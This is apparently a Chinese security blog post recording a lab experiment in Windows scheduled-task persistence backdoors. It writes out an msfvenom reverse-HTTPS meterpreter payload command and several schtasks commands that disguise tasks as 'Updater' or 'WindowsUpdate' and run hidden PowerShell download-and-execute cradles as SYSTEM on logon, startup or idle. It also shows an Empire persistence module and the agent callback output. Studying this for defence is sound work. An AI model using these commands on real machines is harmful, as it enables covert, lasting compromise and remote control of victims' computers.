许多黑客为了持续控制肉鸡，都会添加计划任务，维护黑客工具的稳定性。不仅仅是黑客，像我在「ailx10：HFish开源蜜罐框架系统」的实践过程中，也用到了计划任务，来保证进程始终存活。「计划任务后门」可以让计算机病毒藏的更持久，就算你找到病毒，把它删掉了，只要重启电脑，计划任务又自动生成的病毒。因此保持计划任务的干净，是每个安全工程师时刻重视的基本职业素养。

ailx10 网络安全优秀回答者

在powershell中模拟计划任务后门没有接收端（不成功）

Powershell版本的Persistence模块，下载地址：github项目 。在这个实验里，首先需要制作一个载荷，也就是计划任务执行的载荷，这里通过下面的命名执行，获得ailx10.ps1文件，放在实验目录c:/study目录下。

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.160.140 lport=443 -f psh-reflection -o ailx10.ps1

进入主题，首先下载github中的脚本，然后在powershell中加载，运行下面3行命令，获得2个脚本，分别是Persistence.ps1和RemovePersistence.ps1文件。

$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdleAdd-Persistence -FilePath ./ailx10.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceoption $UserOptions -Verbose

在客户端加载产生的Persistence.ps1脚本，会添加一个计划任务后门，在计算机空闲状态时，会创建一个powershell.exe程序。

schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive"

但是书上并没有告诉你，服务端怎么接收这个shell。

在metasploit中模拟「计划任务后门」实验它一样死活不成功啊

服务端：生成的一句话口令，扔到客户端，结果客户端就是不工作～

powershell.exe -nop -w hidden -c $f=new-object net.webclient;$f.proxy=[Net.WebRequest]::GetSystemWebProxy();$f.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $f.downloadstring(';);

客户端：三选一，可以没能见证奇迹的发生，有时候生活就是这样～

添加计划任务（用户登陆）

schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring('';''))'" /sc onlogon /ru System

schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring('';''))'" /sc onstart /ru System

schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring('';''))'" /sc onidle /i 1

2020年9月19日更新：在锤了好几次之后都没有锤爆之后，只能去做下一个实验，然而运气就是这么好，通过empire实验的启发，成功的完成了「计划任务后门」，更加劲爆的还是system 权限～

ailx10：注册表注入后门的简单实验

进入模块（usemodule persistence/elevated/schtasks）设置定时任务时间（set DailyTime 17:20）走你（execute）

成功: 成功创建计划任务 "Updater"。Schtasks persistence established using listener ailx10 stored inHKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 17:20.

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen ----     -- -----------     ------------      --------                -------            ---    -----    --------- HT1C2UNM ps 192.168.160.128 WIN-D2GN1OUFTMB   *WORKGROUP\SYSTEM       powershell         2980   5/0.0    2020-09-19 17:20:20

本篇完